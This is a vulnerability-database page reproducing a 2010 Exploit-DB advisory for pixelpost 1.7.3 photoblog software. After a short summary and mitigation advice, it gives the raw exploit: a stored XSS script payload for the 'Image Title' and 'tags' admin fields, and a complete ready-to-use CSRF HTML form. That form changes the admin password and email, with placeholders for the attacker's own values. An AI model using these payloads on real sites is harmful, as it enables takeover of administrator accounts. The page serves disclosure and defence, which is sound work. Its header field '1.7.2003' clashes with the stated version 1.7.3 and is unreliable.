pixelpost_v1.7.3 Multiple vulnerabilities

vendor:

by:

Sweet

7.5

CVSS

HIGH

Stored XSS, CSRF

CWE

Product Name:

Affected Version From: 1.7.2003

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2010

pixelpost_v1.7.3 Multiple vulnerabilities

The software version 1.7.3 of pixelpost is vulnerable to stored XSS and CSRF attacks. The 'Image Title' and 'tags' parameters in the admin login page are vulnerable to stored XSS. An attacker can inject malicious code, such as <script>alert('sweet')</script>, to execute arbitrary JavaScript code. Additionally, the admin password change functionality is vulnerable to CSRF. An attacker can change the admin password by sending a crafted request to the 'options' endpoint.

Mitigation:

Upgrade to a version higher than 1.7.3, if available. Apply necessary patches and security updates. Use input validation and output encoding to prevent XSS attacks. Implement CSRF protection mechanisms, such as using CSRF tokens.

Source

Exploit-DB raw data:

1  [+]Exploit Title: pixelpost_v1.7.3 Multiple vulnerabilities         0
0  [+]Date: 15/09/2010                                                 1
1  [+]Author: Sweet                                                    0
0  [+]Contact : charif38@hotmail.fr                                    0
1  [+]Software Link:  http://www.pixelpost.org/                        0
0  [+]Download: http://www.pixelpost.org/                              1
1  [+]Version: 1.7.3                                                   0
0  [+]Tested on: WinXp sp3                                             1
1  [+]Risk :Hight                                                      0
0  [+]Description :                                                    0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

---=Stored Xss=---
admin login required

in http://www.target.com/path/admin/index.php? the post variable "Image Title" and "tags" are vulnerable to a stored Xss

attack pattern:>"<script>alert("sweet")</script>

---=CSRF change admin password=--- 
<html>
<body>
<h1>Pixelpost_v1.7.3 change admin password CSRF by Sweet </h1>
<form method="POST" name="form0" action="http://www.target.com/path/admin/index.php?view=options&optaction=updateall">
<input type="hidden" name="new_site_title" value="Pixelpost"/>
<input type="hidden" name="new_sub_title" value="Authentic photoblog flavour"/>
<input type="hidden" name="new_site_url" value="http://www.target.com/path/"/>
<input type="hidden" name="new_admin_user" value="admin"/>
<input type="hidden" name="newadminpass" value="password"/> <!-- Your password here -->
<input type="hidden" name="newadminpass_re" value="password"/> <!-- Your password here -->
<input type="hidden" name="passchanged" value="no"/>
<input type="hidden" name="new_lang" value="english"/>
<input type="hidden" name="alt_lang" value="Off"/>
<input type="hidden" name="new_admin_lang" value="english"/>
<input type="hidden" name="new_email" value="charif38@hotmail.fr"/><!-- Your Email here here -->
<input type="hidden" name="new_image_path" value="../images/"/>
<input type="hidden" name="new_thumbnail_path" value="../thumbnails/"/>
<input type="hidden" name="timezone" value="0"/>
<input type="hidden" name="global_comments" value="A"/>
<input type="hidden" name="new_commentemail" value="no"/>
<input type="hidden" name="new_htmlemailnote" value="yes"/>
<input type="hidden" name="timestamp" value="yes"/>
<input type="hidden" name="visitorbooking" value="yes"/>
<input type="hidden" name="markdown" value="F"/>
<input type="hidden" name="exif" value="T"/>
<input type="hidden" name="feed_title" value="Pixelpost"/>
<input type="hidden" name="feed_description" value="Authentic photoblog flavour"/>
<input type="hidden" name="feed_copyright" value="Copyright 2010 http://www.target.com/path/, All Rights Reserved"/>
<input type="hidden" name="feed_discovery" value="RA"/>
<input type="hidden" name="feed_external_type" value="ER"/>
<input type="hidden" name="feed_external" value=""/>
<input type="hidden" name="allow_comment_feed" value="Y"/>
<input type="hidden" name="rsstype" value="T"/>
<input type="hidden" name="feeditems" value="10"/>
<input type="hidden" name="display_sort_by" value="datetime"/>
<input type="hidden" name="display_order" value="default"/>
<p> Push the button <input type="submit" name="update" value="GO!"/></p>
</form>
</body>
</html>

thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , exploit-db.com


1,2,3 viva L'Algerie :))